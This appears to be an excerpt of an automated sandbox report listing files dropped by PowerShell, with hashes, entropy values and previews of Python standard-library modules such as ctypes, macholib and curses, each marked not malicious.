                              Preview:"""create and manipulate C data types in Python"""....import os as _os, sys as _sys..import types as _types....__version__ = "1.1.0"....from _ctypes import Union, Structure, Array..from _ctypes import _Pointer..from _ctypes import CFuncPtr as _CFuncPtr..from _ctypes import __version__ as _ctypes_version..from _ctypes import RTLD_LOCAL, RTLD_GLOBAL..from _ctypes import ArgumentError..from _ctypes import SIZEOF_TIME_T....from struct import calcsize as _calcsize....if __version__ != _ctypes_version:.. raise Exception("Version number mismatch", __version__, _ctypes_version)....if _os.name == "nt":.. from _ctypes import FormatError....DEFAULT_MODE = RTLD_LOCAL..if _os.name == "posix" and _sys.platform == "darwin":.. # On OS X 10.3, we use RTLD_GLOBAL as default mode.. # because RTLD_LOCAL does not work at least on some.. # libraries. OS X 10.3 is Darwin 7, so we check for.. # that..... if int(_os.uname().release.split('.')[0]) < 8:.. DEFAULT_MODE = RTLD_GLOBAL..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):23488
                              Entropy (8bit):5.346139146330718
                              Encrypted:false
                              SSDEEP:384:2lGVs/ZHPqa7o0b0/0V+FfgE8cV62nbrkTWTuD8eXJ9mOd/4cXgw:28GZHPX7bA8V+FfgIbwauIQJ3+cXP
                              MD5:E2B942B6814A6D1CAD2E720A7B7C1BC6
                              SHA1:B1AF27740BA54FF33AD8A788E0BEA405E4053E7B
                              SHA-256:2EB5CCBED547F4CB54BD86D1BBDD8A91BDB9F4D7758B09279BA6BCA889EF4D5C
                              SHA-512:5A0248BF8670F28D5C727D33E7D1857C91413A86E3420676C0E35D342252BD638485D25CC7C9E1F42A0CF18330C842F5A5EFEB6BC8F1923620B52A99868215C8
                              Malicious:false
                              Preview:.........U.fII........................d.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.k7..r...e.d.e.e...........e.j0..................d.k(..r.d.d.l.m.Z...e.Z.e.j0..................d.k(..rGe.j6..................d.k(..r8..e...e.j:..........................j<..................j?..................d.........d.............d.k...r.e.Z.d.d.l.m Z!m"Z#m$Z%m&Z'..dpd...Z(e(Z)i.Z*d...Z+e.j0..................d.k(..r?d.d.l.m,Z-..d.d.l.m.Z/..i.Z0d...Z1e1j...................r7e+j...................je..................d.d.........e1_.........n.e.j0..................d.k(..r.d.d.l.m3Z-..d.d.l.m4Z4m5Z5m6Z6m7Z7m8Z8..d.d.l.m9Z9m:Z:..d.d.l.m;Z;..dpd...Z<..G.d ..d!e;........Z=..e<e=d"............G.d#..d$e;........Z>..e<e>............G.d%..d&e;........Z?..e<e?............G.d'..d(e;........Z@..e<e@............G.d)..d*e;........ZA..e<eA............e.d+..........e.d,........k(..r.e@ZBeAZCn&..G.d-..d.e;........ZB..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3419
                              Entropy (8bit):5.31472116996175
                              Encrypted:false
                              SSDEEP:48:jrbQ8VPBJ0tfg45iHSuSaXfuOhtgab/ex9TctRlFpAPir3nWrofP3+l:jrbQ8Vr0/duSiZ1CPA4c3WU3+l
                              MD5:0FDA9DC9C51560C5455DDC99B95DCFE8
                              SHA1:46794653086D98B8D64EEE575E7A04689BEEA63A
                              SHA-256:4BED1C75E896DF05229E609FD827D94A5382E92B158595141B487A70600D5C35
                              SHA-512:7C110F406DEAFAD91D00468D23C38CC0E76A189DED1E8D9491DC3692FBEB5887CAD20EE10A0A97B989FDD67529B2FB8B5AD4E183D535DAB1D0F1F254503C83C7
                              Malicious:false
                              Preview:.........U.f5.........................V.....d.d.l.Z.d.d.l.......e.e.........Z.d...Z...G.d...d.........Z...G.d...d.e...e.e.................Z...G.d...d.e...e.e.................Z.e.j...................d.k(..r!d.Z.e.Z...G.d...d.e.e...........Z.e.Z...G.d...d.e.e...........Z.y.e.j...................d.k(..r!d.Z.e.Z...G.d...d.e.e...........Z.e.Z...G.d...d.e.e...........Z.y...e.d...........)......N)...*c...........................t.........|.t.................r.t.........|.t.................S.t.........|.t.................r"t.........|.j...........................|.j...................z...S.t.........|.t.........t.........f.........r.|.S.t.........d.|.z.............).z.Return the type with the 'other' byte order. Simple types like. c_int and so on already have __ctype_be__ and __ctype_le__. attributes which contain the types, for more complicated types. arrays and structures are supported.. z+This type does not support other endian: %s)...hasattr.._OTHER_ENDIAN..getattr..isinstance
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8534
                              Entropy (8bit):5.393222042976087
                              Encrypted:false
                              SSDEEP:96:TU0S9nj00d546IM1nWolOnr4qicqWPfeyGPkPrKadgLaHUaz+tEO9okA9ft:TU0ThM1nhmW2PfeMbZHUaStT9oBb
                              MD5:EBA3773F401A0B4CF6A22ED767E84714
                              SHA1:960E246FF17E6FBA5687E3AC0D36F8BF6EDA4C7F
                              SHA-256:3EA08F1EF5259ACDF43FFE6AE28FE81E9934A4386E0DDAB2346F61138E57100B
                              SHA-512:4DCDB4016E94B5F4D0B1540FF4861DF88C05393B12792FEE6B164C8B7DA8B6A13F3F678E3E59B8E5C55550EAF8CD2C57B67ED32FB82D3C999CE92EFDF0EB4497
                              Malicious:false
                              Preview:.........U.f................................d.d.l.Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j"..................Z.e.Z.e.j(..................Z...G.d...d.e.j,..........................Z.e.j...................Z.e.j(..................Z.e.j...................Z.e.j6..................Z.e.j:..................x.Z.Z.e.j@..................x.Z!Z"e.jF..................x.Z$x.Z%Z&e.jF..................x.Z'Z(e.jR..................x.Z*Z+e.jX..................x.Z-Z...e.j^..................e.j(............................e.j^..................e.jX..........................k(..r.e.j...................Z0e.j(..................Z1nQ..e.j^..................e.j:............................e.j^..................e.jX..........................k(..r.e.j@..................Z0e.j:..................Z1e.Z2e.Z3e.Z4e.Z5e.Z6e.Z7e.jX..................Z8e8Z9e8Z:e8Z;e8Z<e8Z=
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):12832
                              Entropy (8bit):4.715885314022073
                              Encrypted:false
                              SSDEEP:192:6u9ZuBRuVbIHqmh3Ahi9Dl9tUTquqCYDS4ZK7TZUzvMsHpHs6NCir99b/wtpvB:6uvu/uJOhwhih9mabUlwvMKHFJn/W7
                              MD5:4964E0FCECD0CB9780E294800A063415
                              SHA1:ABE3B880D15FDD7453A82BA1986A1A3B1C29F25A
                              SHA-256:BCE659C2BF31D4B54C69D2E238DD097392F4108E7970C5E741E415A44D281740
                              SHA-512:A7F32ABB9B29995905D37D0685D14F848A4BF84A1FF00F4E6DC125424457A3031398163DA75A86FF191DE9D2444A749E7B5BAD988E0AA2373F33706131E43FF7
                              Malicious:false
                              Preview:"""..Lib/ctypes.util.find_library() support for AIX..Similar approach as done for Darwin support by using separate files..but unlike Darwin - no extension such as ctypes.macholib.*....dlopen() is an interface to AIX initAndLoad() - primary documentation at:..https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/dlopen.htm..https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm....AIX supports two styles for dlopen(): svr4 (System V Release 4) which is common on posix..platforms, but also a BSD style - aka SVR3.....From AIX 5.3 Difference Addendum (December 2004)..2.9 SVR4 linking affinity..Nowadays, there are two major object file formats used by the operating systems:..XCOFF: The COFF enhanced by IBM and others. The original COFF (Common..Object File Format) was the base of SVR3 and BSD 4.2 systems...ELF: Executable and Linking Format that was developed by AT&T and is a..base for SVR4 UNIX.....While the shared library content
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2613
                              Entropy (8bit):4.666359289995818
                              Encrypted:false
                              SSDEEP:48:kFppFNPBJ5MJKfuf7OUGsH80jw10I478jzQ0o47QDv:kFpHNr5+Z9jw1PCGEVCsv
                              MD5:7DAA213263C75057CF125267B7FDFBD3
                              SHA1:EFB9403D8E3F09734F6B2BA3889B274997D0A039
                              SHA-256:8C5B9AC7306DCF98856C9B815A5FC604BA0F47ACAB15AC47AD858499C6981579
                              SHA-512:1E00F043AB8F3F77A81C8C6EA6760625BCDF2ECCBEF6432266F75E89F28778B48BD2709DBCF9D70A4A4E1384629AED31C7FDACDF4723FE18F36B6D9366B03921
                              Malicious:false
                              Preview:import sys..from ctypes import *...._array_type = type(Array)....def _other_endian(typ):.. """Return the type with the 'other' byte order. Simple types like.. c_int and so on already have __ctype_be__ and __ctype_le__.. attributes which contain the types, for more complicated types.. arrays and structures are supported... """.. # check _OTHER_ENDIAN attribute (present if typ is primitive type).. if hasattr(typ, _OTHER_ENDIAN):.. return getattr(typ, _OTHER_ENDIAN).. # if typ is array.. if isinstance(typ, _array_type):.. return _other_endian(typ._type_) * typ._length_.. # if typ is structure or union.. if issubclass(typ, (Structure, Union)):.. return typ.. raise TypeError("This type does not support other endian: %s" % typ)....class _swapped_meta:.. def __setattr__(self, attrname, value):.. if attrname == "_fields_":.. fields = [].. for desc in value:.. name = desc[0]..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):302
                              Entropy (8bit):4.852668847464629
                              Encrypted:false
                              SSDEEP:6:8z2wHVpWObNLeQ9exK2kbFYQxEMWLh2jvW/oz2tHRAuyn:8z20hFeOT1DMd2jvb2txa
                              MD5:7AD62828A8A0FCA041912A20B451904E
                              SHA1:A90A30E3BC7CCC4800DB1A31DC3CDE3B7C4A86FD
                              SHA-256:99F3754DEC345ED71E2BCB337E3CDC58B1A4C02D290D870DC20CCDD1FF543AE1
                              SHA-512:0E111B5D5282ECE51BA41980D4DE56A38FF7A826173A9D883925968EE71BD664C74436FF319CF4AEF482972BC3689A75AADDE2359C2EEAA91D32B9DA534FCAAD
                              Malicious:false
                              Preview:Files in this directory come from Bob Ippolito's py2app.....License: Any components of the py2app suite may be distributed under..the MIT or PSF open source licenses.....This is version 1.0, SVN revision 789, from 2006/01/25...The main repository is http://svn.red-bean.com/bob/macholib/trunk/macholib/
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):163
                              Entropy (8bit):4.7583014539285395
                              Encrypted:false
                              SSDEEP:3:IG7yVQV368exRnfNAoWQJpKNdeATVYaFWKOvouRBeofHOtvZLl:IR6V3exRn5WQbceAJYasKOvou3HOV1l
                              MD5:B4E0F252AC2C050A15FAE8D8D5153924
                              SHA1:B66E8FF57523BDC8E3C1947D84E137B54CEF0E69
                              SHA-256:AD449177F69D3150373892859AFF90A1882982E9ABA313B919711B7F38370DEF
                              SHA-512:B627C5F8A3E16201F4E223AC30A69BA27D1778B9D28DC6B4CFF900EF8123262FAF4E250796E30BF7CA1CA997AD70F15A59B940E19A4DB675DA3892F2C1FB4BC8
                              Malicious:false
                              Preview:"""..Enough Mach-O to make your head spin.....See the relevant header files in /usr/include/mach-o....And also Apple's documentation..."""....__version__ = '1.0'..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5189
                              Entropy (8bit):4.901036985693502
                              Encrypted:false
                              SSDEEP:96:63JF54Kcs5IwOijuELt+hE5zGQ1RK+G9nMexZs0tugAoEwdGfs0tutPScYu5DB7j:4d4KDOl6Vo4pRi9nlXs0sgx8fs0stPSy
                              MD5:1BB932CB9991850197F2E64790AE6FE6
                              SHA1:478BA77998AF0320658DF4DDF7EAD8CD3E15D8BF
                              SHA-256:ED0F3454B06E302EF7393001D638883CE05D471E70550B2AE811D4B169BFEAA1
                              SHA-512:D43C08E4C7B3D42A38CD9E77DE59EC11DF205BF105AB565944B6EDE4FE708E0293B2EEC5D15E87C52388E60CE40BA9C3A73EDCB60485057CF59984501BF1345A
                              Malicious:false
                              Preview:"""..dyld emulation.."""....import os..from ctypes.macholib.framework import framework_info..from ctypes.macholib.dylib import dylib_info..from itertools import *..try:.. from _ctypes import _dyld_shared_cache_contains_path..except ImportError:.. def _dyld_shared_cache_contains_path(*args):.. raise NotImplementedError....__all__ = [.. 'dyld_find', 'framework_find',.. 'framework_info', 'dylib_info',..]....# These are the defaults as per man dyld(1)..#..DEFAULT_FRAMEWORK_FALLBACK = [.. os.path.expanduser("~/Library/Frameworks"),.. "/Library/Frameworks",.. "/Network/Library/Frameworks",.. "/System/Library/Frameworks",..]....DEFAULT_LIBRARY_FALLBACK = [.. os.path.expanduser("~/lib"),.. "/usr/local/lib",.. "/lib",.. "/usr/lib",..]....def dyld_env(env, var):.. if env is None:.. env = os.environ.. rval = env.get(var).. if rval is None:.. return [].. return rval.split(':')....def dyld_image_suffix(env=None):.. if env is No
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1002
                              Entropy (8bit):4.828398959046457
                              Encrypted:false
                              SSDEEP:24:YVXQSPAb4wdiRaydyrLenQFWLytu9xu/UKS0HKW3:vS4hodWSQY3a/U12KW3
                              MD5:890D710C8932B085C7B77B44E18E0321
                              SHA1:599CE25EF2A5CF997CDFBB4841284CF11B459D3B
                              SHA-256:0F3158FEA8FADBB07B597E05DF93221150CC6EFE21EC1376379EF9EF82DDCD01
                              SHA-512:D64AFB135AE91D3E937D2A7EF66C8B2D91B5545C00EF0BA98A2EDD91AF6B400C5768D370768D03AC1245ABD21D5D4819036B189F274C0F8E0BE7659E46612E64
                              Malicious:false
                              Preview:"""..Generic dylib path manipulation.."""....import re....__all__ = ['dylib_info']....DYLIB_RE = re.compile(r"""(?x)..(?P<location>^.*)(?:^|/)..(?P<name>.. (?P<shortname>\w+?).. (?:\.(?P<version>[^._]+))?.. (?:_(?P<suffix>[^._]+))?.. \.dylib$..)..""")....def dylib_info(filename):.. """.. A dylib name can take one of the following four forms:.. Location/Name.SomeVersion_Suffix.dylib.. Location/Name.SomeVersion.dylib.. Location/Name_Suffix.dylib.. Location/Name.dylib.... returns None if not found or a mapping equivalent to:.. dict(.. location='Location',.. name='Name.SomeVersion_Suffix.dylib',.. shortname='Name',.. version='SomeVersion',.. suffix='Suffix',.. ).... Note that SomeVersion and Suffix are optional and may be None.. if not present... """.. is_dylib = DYLIB_RE.match(filename).. if not is_dylib:.. return None.. return is_dylib.groupdict()
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):86
                              Entropy (8bit):4.592685213899164
                              Encrypted:false
                              SSDEEP:3:TKH4o8xYdp14T7LtH77RXQ6Iaygn:ho82b2tHRAuygn
                              MD5:03FC2CB5CFDE6E1C4A2699CD2193133D
                              SHA1:F7FA6A9D1369B55F332E7E21AFE647C2DA05F81B
                              SHA-256:7B9EB3A8AF1D12DA22604845995982CA99992876A825F3765E053DDB592620AB
                              SHA-512:3CB6955D49468F961896DEDFA7AD51FA608D3E9BA5B88946410DD106827040C34F65DEB0DEBBAA6255E11F1380E11FE08310C4688F9845AFA0141178F848248C
                              Malicious:false
                              Preview:#!/bin/sh..svn export --force http://svn.red-bean.com/bob/macholib/trunk/macholib/ ...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):75
                              Entropy (8bit):4.514880857909424
                              Encrypted:false
                              SSDEEP:3:Sydp14T7LtH77RXQ6Iaygn:tb2tHRAuygn
                              MD5:B88DFC5590F1D09D550605F3AFCAC0D7
                              SHA1:6724D16CF05434F9B77179D3A340A800EB1AF0DD
                              SHA-256:7497FBDBB98AFCA4AC455E3A057C59BCDEBAF1280E25C94741DC301F05CB53E5
                              SHA-512:B154B6C65DD7407D412BBC1BB91D73EE6CBEB94AFE21BF46531B82110095F4F58A80B9A6975FF5FE6902116A313FF22FA50BE33429A643D7C35287C0E0BB2BB1
                              Malicious:false
                              Preview:svn export --force http://svn.red-bean.com/bob/macholib/trunk/macholib/ ...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1147
                              Entropy (8bit):4.884155206995322
                              Encrypted:false
                              SSDEEP:24:R3AXXQITql4Xhdx8SRy4C0gyFWK9xu/UKHb4WB:RQXAITOwx5A4C0gWHa/Uyb4WB
                              MD5:73E5999E096486C2EA108B838F347085
                              SHA1:CB25F00F5E97F71C71CFA0F38FF849CD5799C257
                              SHA-256:CC5499B69551299EB4CCBD9C5C99260F9D39EB3FD0794BFAF9F727D26D013BD1
                              SHA-512:36B454CE3BF879A9A81F353D4FF5773CB4A18B334BB89A7A3FC34DA30EB0413ACAFEB12F5154EB8EE2DDFA0D7BADCD3C9B61D12557362D44AB86B65406CAFD23
                              Malicious:false
                              Preview:"""..Generic framework path manipulation.."""....import re....__all__ = ['framework_info']....STRICT_FRAMEWORK_RE = re.compile(r"""(?x)..(?P<location>^.*)(?:^|/)..(?P<name>.. (?P<shortname>\w+).framework/.. (?:Versions/(?P<version>[^/]+)/)?.. (?P=shortname).. (?:_(?P<suffix>[^_]+))?..)$..""")....def framework_info(filename):.. """.. A framework name can take one of the following four forms:.. Location/Name.framework/Versions/SomeVersion/Name_Suffix.. Location/Name.framework/Versions/SomeVersion/Name.. Location/Name.framework/Name_Suffix.. Location/Name.framework/Name.... returns None if not found, or a mapping equivalent to:.. dict(.. location='Location',.. name='Name.framework/Versions/SomeVersion/Name_Suffix',.. shortname='Name',.. version='SomeVersion',.. suffix='Suffix',.. ).... Note that SomeVersion and Suffix are optional and may be None.. if not present..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):14338
                              Entropy (8bit):4.328964645531019
                              Encrypted:false
                              SSDEEP:384:eJqRMNQWKSUWWziB6NQZi2JspavNCXlkFZ:eoSeWKSUWW2B6Np2Qa1CXlkFZ
                              MD5:E728472FF9709B5296D5B6829CB40E69
                              SHA1:8950CA0142AF7EA7D04FF912F865F83F758ACDC9
                              SHA-256:A1425DA6F4324E7ECFC08E6EFD11792621BA7AF5E075AD3AC056048146EC950A
                              SHA-512:740695CAF097A46C9626890E9FBEC4D6C10B028D1AC68931DD0E80949E9C4C29B1EA77CC4F693AC95E02276AC5A086225D23CC298C3FC2C5E6F8139E21268D7C
                              Malicious:false
                              Preview:import os..import shutil..import subprocess..import sys....# find_library(name) returns the pathname of a library, or None...if os.name == "nt":.... def _get_build_version():.. """Return the version of MSVC that was used to build Python..... For Python 2.3 and up, the version number is included in.. sys.version. For earlier versions, assume the compiler is MSVC 6... """.. # This function was copied from Lib/distutils/msvccompiler.py.. prefix = "MSC v.".. i = sys.version.find(prefix).. if i == -1:.. return 6.. i = i + len(prefix).. s, rest = sys.version[i:].split(" ", 1).. majorVersion = int(s[:-2]) - 6.. if majorVersion >= 13:.. majorVersion += 1.. minorVersion = int(s[2:3]) / 10.0.. # I don't think paths are affected by minor version in version 6.. if majorVersion == 6:.. minorVersion = 0.. if majorVersion >= 6:.. return majorV
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5831
                              Entropy (8bit):5.213234544711431
                              Encrypted:false
                              SSDEEP:96:OIg/H+tkjWHgK0WVeZMgs4EnV6V7VxiLZgV2YVvjOlXJtiJtVzq3xk5b3:+LSCsHV6V7VkLZgV2YVvoXJtiJtVG6
                              MD5:FC9DB9D554AC39F8D49E34ACA030A2E2
                              SHA1:AEF28B19D54F318C81CE7CC3951C8F3A02DD7209
                              SHA-256:4D9150E8603BD922E9DBEE8A5E9CF1379CF599A382B09A5CBF09BED520F6C459
                              SHA-512:97746A8F02773D29B4F7814DAD3F4FAE0C29FF5D090606F81D4AE52E680F8292EF53C6916B8D0E60D368B3D8286C81961A919E67B5C1F9DD304E8158D34AD0A0
                              Malicious:false
                              Preview:# The most useful windows datatypes..import ctypes....BYTE = ctypes.c_ubyte..WORD = ctypes.c_ushort..DWORD = ctypes.c_ulong....#UCHAR = ctypes.c_uchar..CHAR = ctypes.c_char..WCHAR = ctypes.c_wchar..UINT = ctypes.c_uint..INT = ctypes.c_int....DOUBLE = ctypes.c_double..FLOAT = ctypes.c_float....BOOLEAN = BYTE..BOOL = ctypes.c_long....class VARIANT_BOOL(ctypes._SimpleCData):.. _type_ = "v".. def __repr__(self):.. return "%s(%r)" % (self.__class__.__name__, self.value)....ULONG = ctypes.c_ulong..LONG = ctypes.c_long....USHORT = ctypes.c_ushort..SHORT = ctypes.c_short....# in the windows header files, these are structures..._LARGE_INTEGER = LARGE_INTEGER = ctypes.c_longlong.._ULARGE_INTEGER = ULARGE_INTEGER = ctypes.c_ulonglong....LPCOLESTR = LPOLESTR = OLESTR = ctypes.c_wchar_p..LPCWSTR = LPWSTR = ctypes.c_wchar_p..LPCSTR = LPSTR = ctypes.c_char_p..LPCVOID = LPVOID = ctypes.c_void_p....# WPARAM is defined as UINT_PTR (unsigned type)..# LPARAM is defined as LONG_PTR (signed typ
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3470
                              Entropy (8bit):4.6313548180715145
                              Encrypted:false
                              SSDEEP:48:X34viBZiikmTPnKpgaXObF6tGZqGCNj3OWPI/RWg7vCwi0eIKT5KLJghEfUwRTWi:X3xZJpaC6DheWIY6qtzIY0e29L
                              MD5:63A612B59CF6205D8F5DC6984B8030C0
                              SHA1:825D120E85A437872023475A70894A3E74D6023D
                              SHA-256:EF71D789E173399F3F33F1EF5F5284456C9F3690779D1E597F3A92BD67C64E9C
                              SHA-512:7A0666A8257FAA4D4E236E71EC63B9ECB6DFCB1F7A504EAA8E2030E99EF5AE525211DF9500CBA51DB5DE0DEE2CC0D7F913FC815B05FD2FE7331B78D1A65CCBD3
                              Malicious:false
                              Preview:"""curses....The main package for curses support for Python. Normally used by importing..the package, and perhaps a particular module inside it..... import curses.. from curses import textpad.. curses.initscr().. ......."""....from _curses import *..import os as _os..import sys as _sys....# Some constants, most notably the ACS_* ones, are only added to the C..# _curses module's dictionary after initscr() is called. (Some..# versions of SGI's curses don't define values for those constants..# until initscr() has been called.) This wrapper function calls the..# underlying C initscr(), and then copies the constants from the..# _curses module to the curses package's dictionary. Don't do 'from..# curses import *' if you'll be needing the ACS_* constants.....def initscr():.. import _curses, curses.. # we call setupterm() here because it raises an error.. # instead of calling exit() in error cases... setupterm(term=_os.environ.get("TERM", "unknown"),.. fd=_
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2642
                              Entropy (8bit):4.8016671130608986
                              Encrypted:false
                              SSDEEP:48:6qKTzixq3sIkl75d2k3Z1gxDgZhl9F0zEnu7USaAtIamVrEJG:6taDqk3PvZhPyEn2UfAtIzVreG
                              MD5:79B27D9EBA6AEF0DB15B4DDD647CC186
                              SHA1:B8C84580CA9AA9E911B8C3BBDF66F5B587388DDC
                              SHA-256:DD74F344619190C939DAAF216DF8790C41C5CC859B5D35E806BA602519233180
                              SHA-512:F199785915C77DEA5F5B06532BF85401BB665E53E3E3FC93B95C626110D79DC4433E2EAB9E64A63BF79AE146520CD603C818C6DAEF719370897C3AE14582F8F3
                              Malicious:false
                              Preview:"""Constants and membership tests for ASCII characters"""....NUL = 0x00 # ^@..SOH = 0x01 # ^A..STX = 0x02 # ^B..ETX = 0x03 # ^C..EOT = 0x04 # ^D..ENQ = 0x05 # ^E..ACK = 0x06 # ^F..BEL = 0x07 # ^G..BS = 0x08 # ^H..TAB = 0x09 # ^I..HT = 0x09 # ^I..LF = 0x0a # ^J..NL = 0x0a # ^J..VT = 0x0b # ^K..FF = 0x0c # ^L..CR = 0x0d # ^M..SO = 0x0e # ^N..SI = 0x0f # ^O..DLE = 0x10 # ^P..DC1 = 0x11 # ^Q..DC2 = 0x12 # ^R..DC3 = 0x13 # ^S..DC4 = 0x14 # ^T..NAK = 0x15 # ^U..SYN = 0x16 # ^V..ETB = 0x17 # ^W..CAN = 0x18 # ^X..EM = 0x19 # ^Y..SUB = 0x1a # ^Z..ESC = 0x1b # ^[..FS = 0x1c # ^\..GS = 0x1d # ^]..RS = 0x1e # ^^..US = 0x1f # ^_..SP = 0x20 # space..DEL = 0x7f # delete....controlnames = [.."NUL", "SOH", "STX", "ETX", "EOT", "ENQ", "ACK", "BEL",.."BS", "HT", "LF", "VT", "FF", "CR", "SO", "SI",.."DLE",
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5826
                              Entropy (8bit):4.959924122820079
                              Encrypted:false
                              SSDEEP:96:uuz7HHzV3jkTy3YedCYWh/1aJUEkUQgy6nIhE7Xcpo0Hbo/YsyZ1i3C:uuB9AYUUQgy6n+ysz0/YsyL4C
                              MD5:46B1621C4966F8371A3DEF67C5C6D632
                              SHA1:7037456C1925919F1831799C924D78B7A327E7C7
                              SHA-256:4838A7369459A90C58CFA5804C824F486BFAC1B7A8AE751C7DAB5443B500695E
                              SHA-512:059CFD25C38EB136F68551103470A82571D4A5EBEFB7708CAB16281B84C4ED8F4CA4C8D30FC42696B51099E33BF4319DE149AA760EFE22E7B4616A0902240CEA
                              Malicious:false
                              Preview:..#..# Emulation of has_key() function for platforms that don't use ncurses..#....import _curses....# Table mapping curses keys to the terminfo capability name...._capability_names = {.. _curses.KEY_A1: 'ka1',.. _curses.KEY_A3: 'ka3',.. _curses.KEY_B2: 'kb2',.. _curses.KEY_BACKSPACE: 'kbs',.. _curses.KEY_BEG: 'kbeg',.. _curses.KEY_BTAB: 'kcbt',.. _curses.KEY_C1: 'kc1',.. _curses.KEY_C3: 'kc3',.. _curses.KEY_CANCEL: 'kcan',.. _curses.KEY_CATAB: 'ktbc',.. _curses.KEY_CLEAR: 'kclr',.. _curses.KEY_CLOSE: 'kclo',.. _curses.KEY_COMMAND: 'kcmd',.. _curses.KEY_COPY: 'kcpy',.. _curses.KEY_CREATE: 'kcrt',.. _curses.KEY_CTAB: 'kctab',.. _curses.KEY_DC: 'kdch1',.. _curses.KEY_DL: 'kdl1',.. _curses.KEY_DOWN: 'kcud1',.. _curses.KEY_EIC: 'krmir',.. _curses.KEY_END: 'kend',.. _curses.KEY_ENTER: 'kent',.. _curses.KEY_EOL: 'kel',.. _curses.KEY_EOS: 'ked',.. _curses.KEY_EXIT: 'kext',.. _curses.KEY_F0: 'kf0',.. _curses.KEY_F1
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):93
                              Entropy (8bit):4.41480518258504
                              Encrypted:false
                              SSDEEP:3:XHWSwojbJAUXFJQBXWov3Z6HG7ASBiv:XHWSdjbHXFqX7ii7M
                              MD5:5D453D87DBDD7C37EB62894B472EB094
                              SHA1:67787E6A4D122CD29B3A66D20084E8C6CF0CA126
                              SHA-256:9B10A03C3224939D9BE2A078FE896DA5CFEAA9740D265F8052B5403BC5E15BBF
                              SHA-512:8644680425F755CFB0B62AA5E52ABABE68AB0471A1D79EEEBD99CD9A8EDB6916B5230451BEA9F9B08ACDFE21358666123A2C2DCF3D3212AC2B12D89940DE41F9
                              Malicious:false
                              Preview:"""curses.panel....Module for using panels with curses..."""....from _curses_panel import *..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7958
                              Entropy (8bit):4.318619931355464
                              Encrypted:false
                              SSDEEP:96:P6dHpCmeBad+KxGBjgCt+GgUE8ytI1NZG65K8RFGIsyiU4fIXYivRB264tQga:iYUdl20tI5GWXRhsyiU4ti54tQga
                              MD5:BDF542435AA2442F9368EB5A4AA49C02
                              SHA1:054C1BB893DDCDFD710F9E6D47C3D41AC8396EC0
                              SHA-256:BCDFA4F07204B101F3DA7A0FE6BB5FF7B5BA8C4AA6DBC84EC57E8E3CFA3BC814
                              SHA-512:725A277FB26CDF22171A4AA57D751671B73D31DE807DF535B4267AA3A66C40E4A262F36365166823F08775378C9DF9E83028B94AB455265B812ADCF79415248F
                              Malicious:false
